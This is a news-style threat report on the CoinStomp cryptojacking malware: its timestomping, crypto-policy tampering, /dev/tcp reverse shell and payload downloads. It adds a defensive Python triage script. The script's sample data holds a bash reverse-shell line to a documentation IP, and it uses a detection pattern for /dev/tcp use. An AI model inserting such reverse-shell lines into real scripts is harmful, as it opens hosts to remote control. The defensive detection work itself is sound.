CoinStomp, a new malware family that mines cryptocurrencies on cloud services, has been discovered. This malware appears to be targeting cloud service providers in Asia at the moment.
What is CoinStomp?
The findings on CoinStomp are presented below.
CoinStomp has a number of capabilities, including timestomping, disabling system-wide cryptographic policies, and using a /dev/tcp reverse shell to initiate C2 communication.
On Linux systems, the timestomping routine manipulates file timestamps with the touch command, and the reverse shell relies on /dev/tcp, a facility built into bash, so no additional tooling is needed to build the C2 channel.
Additionally, some evidence pointing to a cryptojacking threat group known as Xanthe has been found in the code. According to the researchers, however, the evidence was insufficient to confirm the link.
Anti-forensic techniques
The malware tries to tamper with the Linux server's cryptographic policies in order to hinder forensic action against itself.
These policies are designed to prevent malicious executables from running. As a result, before taking any other action, the malware's authors use the kill command to disable the system-wide cryptographic settings.
Disabling them up front also ensures that the malware fulfils its objectives even if an administrator later tries to reverse that operation.
In the next stage, CoinStomp uses a reverse shell to connect to its C2 server. The script then downloads additional payloads and executes them as system-wide services with root privileges.
These payloads can include binaries for creating backdoors and a bespoke build of XMRig.
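The three behaviours described above (timestomping with touch, a /dev/tcp reverse shell, and disabled system-wide crypto policies) each leave something a defender can look for on the host. The following is an added triage example written for this page; it is not code from the malware, from the researchers, or from any vendor tool. It assumes a Linux host, assumes the RHEL-family layout in which the active policy name is stored in /etc/crypto-policies/config, and uses constructed sample data; the directory list and the 30-day gap threshold are illustrative defaults.

```python
"""Host-triage helpers for CoinStomp-style indicators (constructed example).

Checks implemented:
  1. timestomping: `touch` can rewrite atime and mtime but not ctime (the
     kernel sets ctime on every inode change), so a file whose mtime is far
     older than its ctime deserves a second look;
  2. /dev/tcp reverse shells: bash opens a socket when a script redirects
     to /dev/tcp/<host>/<port>, so that path in a script is a strong signal;
  3. crypto policy: on RHEL-family hosts the active system-wide policy name
     lives in /etc/crypto-policies/config (assumption about host layout).
"""
import re
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# bash pseudo-device form: /dev/tcp/<host>/<port> (udp variant included).
DEV_TCP_RE = re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d{1,5}")

DAY = 86400.0  # seconds


def looks_timestomped(mtime: float, ctime: float, min_gap_days: float = 30.0) -> bool:
    """True when ctime is at least min_gap_days newer than mtime.

    A normal edit moves mtime and ctime together; `touch -r old_file target`
    drags mtime into the past while ctime still records the moment of the
    touch, which is the gap this check looks for.
    """
    return (ctime - mtime) >= min_gap_days * DAY


def find_dev_tcp_lines(script_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, stripped_line) pairs that reference /dev/tcp or /dev/udp."""
    hits = []
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        if DEV_TCP_RE.search(line):
            hits.append((lineno, line.strip()))
    return hits


def assess_crypto_policy(config_text: Optional[str]) -> str:
    """Classify the contents of /etc/crypto-policies/config.

    'missing' when the file could not be read or is empty, 'legacy' when the
    policy has been downgraded to LEGACY, 'ok' otherwise (DEFAULT, FUTURE, FIPS).
    """
    if config_text is None:
        return "missing"
    policy = config_text.strip().upper()
    if not policy:
        return "missing"
    return "legacy" if policy.startswith("LEGACY") else "ok"


def triage_host(script_dirs=("/etc/cron.d", "/etc/systemd/system"),
                policy_path="/etc/crypto-policies/config") -> Dict[str, object]:
    """I/O wrapper: walk the given directories and apply all three checks."""
    report: Dict[str, object] = {"timestomped": [], "dev_tcp": [], "crypto_policy": None}
    for d in script_dirs:
        for path in Path(d).rglob("*"):
            if not path.is_file():
                continue
            st = path.stat()
            if looks_timestomped(st.st_mtime, st.st_ctime):
                report["timestomped"].append(str(path))
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            for lineno, line in find_dev_tcp_lines(text):
                report["dev_tcp"].append((str(path), lineno, line))
    try:
        cfg: Optional[str] = Path(policy_path).read_text()
    except OSError:
        cfg = None
    report["crypto_policy"] = assess_crypto_policy(cfg)
    return report


# Constructed sample script text; not taken from any real sample.
SAMPLE_SCRIPT = """#!/bin/bash
echo maintenance
exec 3<>/dev/tcp/203.0.113.10/4444
"""

if __name__ == "__main__":
    print(find_dev_tcp_lines(SAMPLE_SCRIPT))
    print(triage_host())
```

The pure functions take timestamps and text rather than paths, so they can be unit-tested without touching the filesystem; triage_host() is the only part that reads the host. The ctime/mtime gap is a heuristic: package upgrades and restores from backup also produce old mtimes with fresh ctimes, so treat a hit as a prompt to inspect the file, not as proof of tampering.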
By eliminating cryptographic policies, the attackers undermine Linux security. The use of anti-forensic tactics suggests that they are also aware of incident response processes. Together, these capabilities show the attackers' understanding of and expertise in cloud security, making CoinStomp a serious threat.